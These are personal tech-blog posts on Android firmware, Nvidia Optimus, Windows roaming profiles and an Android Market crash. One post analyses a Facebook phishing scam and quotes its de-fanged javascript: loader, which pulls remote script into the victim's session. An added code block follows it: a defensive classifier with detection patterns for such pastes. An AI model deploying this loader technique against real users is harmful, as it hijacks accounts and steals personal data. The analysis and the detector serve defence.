HTC Sensation (4G) 1.45.401.2 OTA Update

This week, the HTC Sensation (Pyramid) is being blessed with an OTA update that brings Android Gingerbread 2.3.4 and has been reported to fix the HTC Sense lag issues and generally boost the interactive performance of the device. It’s also suspected that this update prepares the bootloader to be unlockable, because updating to this OTA release prints a “***LOCKED***” text at the top of the bootloader screen.

For those of you that are running a custom ROM, or just have your device rooted, you may already be running 2.3.4, but may be wondering if you could update your bootloader without losing S-Off or root access. The answer is YES!

I’ve attached to this post the extracted “” from the OTA update, which contains the updated bootloader (HBOOT 1.18.0000), radio (10.56.9035.00U_10.14.9035.01_M), and a bunch of other firmwares (pg2fs_spcustom, rcdata, rpm, sbl2, tz). THIS PACKAGE IS MEANT FOR CUSTOM ROM USERS ONLY – I’ve removed the stock HTC kernel and recovery images, assuming that you have installed your own (2.3.4 compatible kernel of your choice, Clockworkmod Recovery). Rename the ZIP file to, place it into the root of your SD card, and reboot into the bootloader to update:

Because this firmware update includes a new radio, I’ve also attached the corresponding radio interface library (RIL) for the radio included in this update. This one must be flashed via recovery, with the /system partition mounted:

Standard disclaimer: I’m not responsible for anything that happens to your device. You’ve been warned. Enjoy!

nVidia Optimus Giving You The Blues?

With a new burst of laptops this year, there is a good handful of them that now come with nVidia Optimus.

What is this technology? In a nutshell, nVidia Optimus is a technology currently for laptops that allows the use of both the onboard Intel GPU and the nVidia GPU simultaneously, depending on the processing needs of the running applications. When an application needs advanced hardware acceleration, it powers up the nVidia GPU from a “sleep” state. This dynamic use of the nVidia GPU allows for lower power consumption (and thus better battery life) because most productivity applications, or even the Windows interface itself, do not need the full power of an nVidia GPU.

There are a few “gotchas” to this technology, however. The first is that you must be running Windows 7 ™ with supported drivers in order to take advantage of this. If you aren’t, then you might be stuck using the Intel GPU, depending on how your system manufacturer routed the video on your motherboard. The second is that some applications don’t automatically run with the nVidia GPU. You might need to manually configure the application to run using the higher power GPU. The final one that I am aware of is that the use of currently available GPU monitoring software or widgets can severely impede hardware performance.

The typical GPU monitoring applications that cause some hardware quirks are the ones that periodically poll the GPU to obtain its temperature, clock speed, load, memory usage, etc. So far, it has caused the following:

    On the Dell XPS 17 (L702X), non-3D edition, running a GPU monitoring app or widget caused the fan to switch on (at high speed) and off. This in turn caused the CPU & GPU temperatures to go on a roller coaster ride, going sky high then back down, inverse to the fan’s state.
    On my Dell Precision M6600, running a GPU monitoring app or widget reduced my battery life by 40 some minutes!

This is all happening because the monitoring app causes the driver to wake up the GPU in order to poll for its status. So users, beware!

Have any other weird issues related to nVidia Optimus? Post a comment below.

Roaming Profiles: From Windows XP to Vista / Windows 7

Quick, short post today, but this will probably save you a lot of time searching for a pretty much non-existent answer to a new “feature” introduced in roaming profiles for Windows Vista and Windows 7. It cost me an hour to figure this out. Hopefully you’ll see this and solve the issue in a jiffy…

You join your brand new Vista or Win7 machines to your domain and then try logging in with a roaming user account and get a popup notification error saying that Windows has logged you in with a temporary profile. You look in the event viewer and see the following:

All the permissions are set correctly for the share and folders for the roaming profile and the user can create files in the roaming profile folder, but the stupid “Access Denied” error message is still there.

Your roaming profile path MUST have a trailing slash at the end now… Likewise:

What the hell, Microsoft? All along you’re lax (*nix had this enforced all along) and now you change it. At least let us know? Please and thank you…

On a slightly different note, I also suggest that you set the following Group Policies to make your sysadmin life easier:
Computer Config\Policies\Administrative Templates\System\Logon --> Always wait for network at computer startup and logon [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Add the Administrators security group to the roaming user profile share [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Wait for remote user profile [Enabled]

As usual, cheers.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.

In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link gets posted on their wall asking them to click a fake link in order to gain access to some “cool” feature such as getting a free iPad, gaining access to see other people’s hidden profile information, or getting free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line of JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER, paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a sent to you, either by e-mail, and/or posted on your wall. It looks something like this:


The link posted takes you to a facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (, which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.
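A defensive check for the pattern described above, as an added example that is not part of the original post: it classifies text a user is about to paste into the address bar, using the post's de-fanged line unchanged as the positive sample. The function names and the block/warn/allow verdicts are assumptions made for this illustration.

```javascript
// The de-fanged line from the post, copied unchanged (it does not run as written).
const DEFANGED = "javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */";

// Signs of the "create a <script>, point it elsewhere, attach it" loader.
const LOADER_SIGNS = [
  /createElement\s*\(\s*["'`]?script/i,        // builds a script element
  /\.src\s*=/i,                                // points it at another origin
  /\b(appendChild|insertBefore|append)\s*\(/i, // attaches it to the page
];

// URL parsers drop leading control characters and spaces, and remove any
// tab, CR or LF in the input, so "  java\tscript:" is still a javascript: URL.
function normalizePaste(text) {
  return text.replace(/^[\u0000-\u0020]+/, "").replace(/[\t\r\n]/g, "");
}

// Hypothetical classifier: "allow" (not a javascript: URL), "warn" (script
// URL without loader signs), "block" (script URL with two or more signs).
function classifyPaste(text) {
  const s = normalizePaste(text);
  if (!/^javascript:/i.test(s)) return { verdict: "allow", signs: 0 };

  let body = s.slice("javascript:".length);
  try {
    // The body of a javascript: URL is percent-decoded before it runs.
    body = decodeURIComponent(body);
  } catch (e) {
    // Malformed escapes: fall back to inspecting the raw text.
  }
  // Comments like "/* FACEBOOK PROFILE VIEWERS */" are bait for the reader only.
  body = body.replace(/\/\*[\s\S]*?\*\//g, " ");

  const signs = LOADER_SIGNS.filter((re) => re.test(body)).length;
  return { verdict: signs >= 2 ? "block" : "warn", signs };
}

// Constructed samples: the post's line, an obfuscated variant of it, and two
// inputs that must not be blocked.
const samples = [
  DEFANGED,
  " \n " + DEFANGED.replace("createElement", "create%45lement"),
  " JaVa\tScRiPt:void(0)",
  "https://www.facebook.com/",
];
for (const sample of samples) {
  console.log(classifyPaste(sample).verdict, "<-", JSON.stringify(sample.slice(0, 40)));
}
```
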

A few other interesting notes:

    ’s index page simply redirects the user to the second Facebook page, via JavaScript.
    Both and have the same IP address (, are registered from eNom, Inc, and are hosted by, as evidenced by their nameservers, NS2767.HOSTGATOR.COM, and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevents identifying details from being revealed.
    is the actual domain where the malicious scripts are run from.


Android Market 2.3 Force Close / Crash

I was stumped by this issue for a long time and was only recently able to find the solution using the Android SDK’s “adb logcat” function to reveal the system logs.

Essentially, you try to install or update an app from the Android market, and it crashes with a force close message. Reading around on the forums over at and other places suggest the following:

Proposed Solution #1
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Uninstall” to uninstall updates, essentially roll back the version to the one that came with your ROM.

Proposed Solution #2
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Clear Data” and “Clear Cache”

Proposed Solution #3 (mainly for CyanogenMod or ROMs that don’t come with the Google apps installed)
Boot into recovery and reinstall the gapps zip file.

Proposed Solution #4
Search for the Market app’s apk file and install it using “adb install -r appname.apk”. Make sure you have Settings -> Applications -> Install from Unknown Sources enabled.

Proposed Solution #5
Wipe all data / factory reset. Obviously #sadface. Or #angryface.

I tried all of the suggested solutions above, except the full reset. Obviously there should be something that doesn’t require that drastic of a change… but none of the other solutions worked. So I turned on USB debugging, ran “adb logcat”, and then reproduced the market force close / crash. Deep in the hundreds of lines of code, I found this:

E/AndroidRuntime( 2975): FATAL EXCEPTION: Download Service
E/AndroidRuntime( 2975): java.lang.SecurityException: Requires VIBRATE permission

What the hell? Yes, I thought the same thing… Why does the market place require vibrate permissions? For notifications maybe… but even more interesting is the fact that the vibrate permissions are required for (the music player), which force closes before the market app.

The solution? I had a profile that turned vibrations off for the default “Media” apps group (by default it only has the Music app in it). Switching it to “No override” fixed the crashing / force close issue in a jiffy.

What’s up with this funky fix? And why does the Android Market need to call the Music app with vibrate permissions? Beats me… too bad Google’s apps are closed source.

EDIT: Known affected Market versions (by me), as of writing: 2.3.2, 2.3.3, 2.3.4.